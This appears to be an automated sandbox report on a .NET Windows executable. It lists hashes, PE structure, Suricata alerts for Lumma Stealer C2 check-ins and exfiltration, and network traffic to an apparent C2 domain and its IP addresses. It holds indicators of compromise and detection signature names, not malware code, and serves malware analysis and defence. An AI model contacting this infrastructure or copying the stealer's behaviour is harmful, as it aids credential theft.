MD5:	c0a15c8328d0eb6c48c194ca52787560
SHA1:	79c65b0b78d7d28729e3ece99e888ca3acdd47e7
SHA256:	cf6e4051d20e654347161dc77b59840a6270cad5e63b4a59a59148c37e776f99
SHA512:	67662b0ab1afbaf4d6dfd9733b6a3eda160b5e5d36049dabda1f668992ab8c9f0f80112c117ad1e5c891b17e8715674dae0d28888157f1c725bb422e64aa4b5a
SSDEEP:	6144:HyJN9fU7GJcGosSgutOEUv340hN9DEGzjgoujWjOI0uf+yf8bErafbonXPajR8dc:SJN9HoD9qv34uN9DHsouaB0ufHazoXCt
TLSH:	FF8412057A93B772C5388778D4E3851406B697D72A33E25B3D4872BA9D233C0DA42FB9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\|G................0.................. ... ....@.. .......................@............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41039e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC6FB477C [Tue Oct 15 09:16:44 2075 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10350	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10309	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe3a4	0xe400	a477556f10e0f94ff07851ab21409ae9	False	0.520764802631579	data	6.042242922628573	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x598	0x600	123aca95e4555687b41c2cebfd368cb4	False	0.41015625	data	4.0349728002939855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xc	0x200	8afa85677c54490f83975db63dd0f5e1	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x16000	0x4ce00	0x4ce00	9cbc06c4dc8eca9f425eb754efac65ff	False	1.0003366361788617	data	7.999394932403458	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x120a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0x123ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T18:11:05.442760+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49707	104.21.64.1	443	TCP
2025-01-15T18:11:05.949857+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.11	49707	104.21.64.1	443	TCP
2025-01-15T18:11:05.949857+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.11	49707	104.21.64.1	443	TCP
2025-01-15T18:11:06.693913+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49708	104.21.64.1	443	TCP
2025-01-15T18:11:07.501941+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.11	49708	104.21.64.1	443	TCP
2025-01-15T18:11:07.501941+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.11	49708	104.21.64.1	443	TCP
2025-01-15T18:11:08.156911+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49710	104.21.64.1	443	TCP
2025-01-15T18:11:08.917043+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.11	49710	104.21.64.1	443	TCP
2025-01-15T18:11:09.451195+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49715	104.21.64.1	443	TCP
2025-01-15T18:11:10.735748+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49727	104.21.64.1	443	TCP
2025-01-15T18:11:12.853049+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49742	104.21.64.1	443	TCP
2025-01-15T18:11:14.284231+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49750	104.21.64.1	443	TCP
2025-01-15T18:11:16.693086+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49769	104.21.64.1	443	TCP
2025-01-15T18:11:17.494241+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.11	49769	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 18:11:04.956841946 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:04.956890106 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:04.957000971 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:04.959758997 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:04.959775925 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.442672014 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.442759991 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.448326111 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.448365927 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.448621988 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.491581917 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.513354063 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.513437986 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.513514996 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.949846029 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.949924946 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:05.949990988 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.969974041 CET	49707	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:05.969995022 CET	443	49707	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:06.050548077 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.050573111 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:06.050643921 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.050951958 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.050961971 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:06.693810940 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:06.693912983 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.754641056 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.754666090 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:06.755105972 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:06.756645918 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.757102013 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:06.757122993 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.501921892 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.501983881 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502034903 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.502052069 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502093077 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502119064 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502135038 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.502141953 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502178907 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.502494097 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502840996 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502881050 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.502911091 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.502916098 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.503006935 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.503014088 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.506563902 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.506640911 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.506647110 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.554088116 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.592329025 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.592398882 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.592453003 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.592461109 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.592515945 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.592562914 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.592828989 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.592842102 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.592864990 CET	49708	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.592869997 CET	443	49708	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.692011118 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.692049980 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:07.692136049 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.692481995 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:07.692493916 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.156826019 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.156910896 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.158406019 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.158410072 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.158734083 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.160480022 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.160480022 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.160542965 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.917066097 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.917196989 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.917257071 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.940087080 CET	49710	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.940107107 CET	443	49710	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.971963882 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.972007990 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:08.972369909 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.972486973 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:08.972505093 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:09.451107025 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:09.451195002 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:09.509351969 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:09.509377956 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:09.509772062 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:09.557487965 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:09.561263084 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:09.561414003 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:09.561454058 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:09.561702013 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:09.561709881 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.130712986 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.130796909 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.130871058 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.131344080 CET	49715	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.131362915 CET	443	49715	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.271572113 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.271605968 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.271863937 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.272106886 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.272119045 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.735682964 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.735748053 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.737234116 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.737238884 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.737490892 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.738748074 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.739013910 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.739052057 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:10.739125013 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:10.739134073 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:11.972405910 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:11.972523928 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:11.977282047 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.033809900 CET	49727	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.033885002 CET	443	49727	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:12.362092972 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.362133026 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:12.362201929 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.362651110 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.362662077 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:12.852915049 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:12.853049040 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.865864992 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.865906000 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:12.866163969 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:12.867679119 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.867763996 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:12.867773056 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:13.412492037 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:13.412627935 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:13.412899017 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:13.412998915 CET	49742	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:13.413022995 CET	443	49742	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:13.808569908 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:13.808614969 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:13.808705091 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:13.809075117 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:13.809092999 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.284128904 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.284230947 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.286001921 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.286015034 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.286365986 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.288238049 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.289294004 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.289350986 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.289465904 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.289501905 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.289598942 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.289680958 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.289797068 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.289834976 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.289967060 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.289999008 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.290122986 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.290154934 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.290169001 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.290293932 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.290332079 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.299617052 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.299808025 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.299849987 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.299856901 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.299880028 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.299895048 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.300035954 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.300091982 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.300121069 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.305604935 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:14.305704117 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:14.305721998 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.227771997 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.227890015 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.227965117 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.229231119 CET	49750	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.229254961 CET	443	49750	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.233359098 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.233393908 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.233645916 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.234106064 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.234122992 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.692862034 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.693085909 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.695091009 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.695108891 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.695360899 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:16.696856976 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.696856976 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:16.696928024 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494245052 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494308949 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494343996 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494379997 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494379044 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.494411945 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494430065 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.494445086 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494483948 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494484901 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.494497061 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494534016 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.494540930 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494863033 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494895935 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494903088 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.494910002 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.494965076 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.494971037 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.495003939 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.495053053 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.495220900 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.495235920 CET	443	49769	104.21.64.1	192.168.2.11
Jan 15, 2025 18:11:17.495248079 CET	49769	443	192.168.2.11	104.21.64.1
Jan 15, 2025 18:11:17.495254040 CET	443	49769	104.21.64.1	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 18:11:04.932427883 CET	61134	53	192.168.2.11	1.1.1.1
Jan 15, 2025 18:11:04.951430082 CET	53	61134	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 18:11:04.932427883 CET	192.168.2.11	1.1.1.1	0x7eb6	Standard query (0)	sobrattyeu.bond	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.112.1	A (IP address)	IN (0x0001)	false
